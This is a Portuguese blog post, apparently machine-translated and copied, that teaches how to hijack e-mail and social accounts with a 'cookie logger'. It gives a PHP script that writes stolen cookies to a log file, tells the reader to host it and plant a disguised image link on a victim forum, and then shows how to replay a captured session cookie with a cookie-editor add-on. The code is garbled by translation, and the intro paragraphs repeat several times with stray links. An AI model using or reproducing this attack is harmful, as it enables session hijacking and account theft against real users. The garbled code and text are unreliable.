Como hackear conta de e-mail usando Cookie Logger

Postado em 21:47 by Administrador

Bem, uma das pergunta que é feita mais para mim é: "Como hackear uma conta de e-mail", por isso hoje eu estou postando uma nova maneira de invadir uma conta de e-mail, eu não estou postando este post para hackers Exite mas para fazer Você está ciente do que está acontecendo ao redor.

NOTA: Este método só funciona, se o alvo do site é vulnerável a XSS.

Os cookies armazena todas as informações necessárias sobre sua conta, usando esta informação você pode hackear conta de alguém e mudar sua senha. Se você pegar os cookies da vítima você pode cortar qualquer conta a vítima está conectado ou seja, você pode cortar o Google, Yahoo, Orkut, Facebook, Flickr etc
O que é um CookieLogger?

A CookieLogger é um script que é usado para roubar cookies e armazena-lo de ninguém em um arquivo de log a partir de onde você pode ler os cookies da vítima.

Hoje vou mostrar como fazer o seu próprio bolinho Logger

Passo 1
  Primeiro você tem que criar um arquivo que pode capturar cookie.So de uma pessoa seguir o seguinte processo. - See more at: http://translate.googleusercontent.com/translate_c?depth=1&hl=pt-BR&rurl=translate.google.com&sl=auto&tl=pt-BR&u=http://www.rafayhackingarticles.net/2009/09/hack-into-email-account.html&usg=ALkJrhiomTsBmQDlCdoKp_kL1cg_j0zrjQ#sthash.lJXL6jjJ.dpuf

ATENÇÃO: Este método só funciona, se o alvo do site é vulnerável a XSS.

Os cookies armazena todas as informações necessárias sobre sua conta, usando esta informação você pode hackear conta de alguém e mudar sua senha. Se você pegar os cookies da vítima você pode hack qualquer conta a vítima está conectado ou seja, você pode Hackear o Google, Yahoo, Facebook,etc...
O que é um CookieLogger?

A CookieLogger é um script que é usado para roubar cookies e armazena-lo de ninguém em um arquivo de log a partir de onde você pode ler os cookies da vítima.

Hoje vou mostrar como fazer o seu próprio cookieLogger

DownloadPasso 1
  Primeiro você tem que criar um arquivo que pode capturar cookie. So de uma pessoa seguir o seguinte processo.


Passo 2
Agora você tem que mudar "http://skynet-hacker.blogspot.com" para o seu site, Você não deve fazer o upload dos arquivos para um diretório.

Agora o bloco de notas aberto e cole o script nele e salve-o como fun.gif

Passo 3

Copie o seguinte script em um arquivo de bloco de notas e salve o arquivo como cookielogger.php:

$ Filename = "logfile.txt";
if (isset ($ _GET ["Cookie"]))
{
if (! $ handle = fopen ($ filename, 'a'))
{
echo "Erro temporário Server, Desculpe o transtorno.";
exit;
}
outro
{
if (fwrite ($ handle, "\ r \ n". $ _GET ["cookies"]) === FALSE)
{
echo "Erro temporário Server, Desculpe o transtorno.";
exit;
}
}
echo "Erro temporário Server, Desculpe o transtorno.";
fclose ($ handle);
exit;
}
echo "Erro temporário Server, Desculpe o transtorno.";
exit;

 

Passo 4: Criar um novo bloco de notas do arquivo e salvá-lo como arquivo_de_log.txt

Envie este arquivo para o seu servidor



cookielogger.php -> http://www.seusite.com/cookielogger.php
logfile.txt -> http://www.seusite.com/logfile.txt (chmod 777)
fun.gif -> http://www.seusite.com/fun.gif

Se você não tem qualquer site, então você pode usar o seguinte site para obter um site gratuito que tem o apoio php:

www.ofees.net
www.t35.com
www.ripway.com


Passo 5: Vá para o fórum vítima e inserir este código na assinatura ou um post:


[url=http://www.seusite.com/fun.gif][img]http://seusite.com/fun.jpg[/img][/url]

Então a pessoa que clicar nele vai pensar que é fun.jpg mas ele redireciona para fun.gif

Passo 6
Então, se você clicar na imagem que você vai ter um erro temporário e você vai encontrar o cookie no arquivo_de_log.txt

Passo 7
  E algo como isso vai ser armazenado no seu "logfile.txt"



phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Passo 8
Para obter o acesso à conta da vítima será necessário substituir os cookies com o cookie da vítima. Você pode usar um editor de cookie para isso. A seqüência de antes "=" é o nome do cookie e cadeia depois "=" é o seu valor. Então mude os valores dos cookie no Editor.

Agora, para isso, você vai precisar de um addon para o firefox "Add N Edit Cookies"

Add and edit cookies"
Passo 4: Criar um novo bloco de notas do arquivo e salvá-lo como arquivo_de_log.txt Envie este arquivo para o seu servidor - See more at: http://translate.googleusercontent.com/translate_c?depth=1&hl=pt-BR&rurl=translate.google.com&sl=auto&tl=pt-BR&u=http://www.rafayhackingarticles.net/2009/09/hack-into-email-account.html&usg=ALkJrhiomTsBmQDlCdoKp_kL1cg_j0zrjQ#sthash.lJXL6jjJ.dpuf
Bem, uma das pergunta que é feita mais para mim é: "Como hackear uma conta de e-mail", por isso hoje eu estou postando uma nova maneira de invadir uma conta de e-mail, eu não estou postando este post para hackers Exite mas para fazer Você está ciente do que está acontecendo ao redor.

NOTA: Este método só funciona, se o alvo do site é vulnerável a XSS.

Os cookies armazena todas as informações necessárias sobre sua conta, usando esta informação você pode hackear conta de alguém e mudar sua senha. Se você pegar os cookies da vítima você pode cortar qualquer conta a vítima está conectado ou seja, você pode cortar o Google, Yahoo, Orkut, Facebook, Flickr etc
O que é um CookieLogger?

A CookieLogger é um script que é usado para roubar cookies e armazena-lo de ninguém em um arquivo de log a partir de onde você pode ler os cookies da vítima.

Hoje vou mostrar como fazer o seu próprio bolinho Logger

Passo 1
  Primeiro você tem que criar um arquivo que pode capturar cookie.So de uma pessoa seguir o seguinte processo. - See more at: http://translate.googleusercontent.com/translate_c?depth=1&hl=pt-BR&rurl=translate.google.com&sl=auto&tl=pt-BR&u=http://www.rafayhackingarticles.net/2009/09/hack-into-email-account.html&usg=ALkJrhiomTsBmQDlCdoKp_kL1cg_j0zrjQ#sthash.lJXL6jjJ.dpuf
Bem, uma das pergunta que é feita mais para mim é: "Como hackear uma conta de e-mail", por isso hoje eu estou postando uma nova maneira de invadir uma conta de e-mail, eu não estou postando este post para hackers Exite mas para fazer Você está ciente do que está acontecendo ao redor.

NOTA: Este método só funciona, se o alvo do site é vulnerável a XSS.

Os cookies armazena todas as informações necessárias sobre sua conta, usando esta informação você pode hackear conta de alguém e mudar sua senha. Se você pegar os cookies da vítima você pode cortar qualquer conta a vítima está conectado ou seja, você pode cortar o Google, Yahoo, Orkut, Facebook, Flickr etc
O que é um CookieLogger?

A CookieLogger é um script que é usado para roubar cookies e armazena-lo de ninguém em um arquivo de log a partir de onde você pode ler os cookies da vítima.

Hoje vou mostrar como fazer o seu próprio bolinho Logger

Passo 1
  Primeiro você tem que criar um arquivo que pode capturar cookie.So de uma pessoa seguir o seguinte processo. - See more at: http://translate.googleusercontent.com/translate_c?depth=1&hl=pt-BR&rurl=translate.google.com&sl=auto&tl=pt-BR&u=http://www.rafayhackingarticles.net/2009/09/hack-into-email-account.html&usg=ALkJrhiomTsBmQDlCdoKp_kL1cg_j0zrjQ#sthash.lJXL6jjJ.dpuf
Bem, uma das pergunta que é feita mais para mim é: "Como hackear uma conta de e-mail", por isso hoje eu estou postando uma nova maneira de invadir uma conta de e-mail, eu não estou postando este post para hackers Exite mas para fazer Você está ciente do que está acontecendo ao redor.

NOTA: Este método só funciona, se o alvo do site é vulnerável a XSS.

Os cookies armazena todas as informações necessárias sobre sua conta, usando esta informação você pode hackear conta de alguém e mudar sua senha. Se você pegar os cookies da vítima você pode cortar qualquer conta a vítima está conectado ou seja, você pode cortar o Google, Yahoo, Orkut, Facebook, Flickr etc
O que é um CookieLogger?

A CookieLogger é um script que é usado para roubar cookies e armazena-lo de ninguém em um arquivo de log a partir de onde você pode ler os cookies da vítima.

Hoje vou mostrar como fazer o seu próprio bolinho Logger

Passo 1
  Primeiro você tem que criar um arquivo que pode capturar cookie.So de uma pessoa seguir o seguinte processo. - See more at: http://translate.googleusercontent.com/translate_c?depth=1&hl=pt-BR&rurl=translate.google.com&sl=auto&tl=pt-BR&u=http://www.rafayhackingarticles.net/2009/09/hack-into-email-account.html&usg=ALkJrhiomTsBmQDlCdoKp_kL1cg_j0zrjQ#sthash.lJXL6jjJ.dpu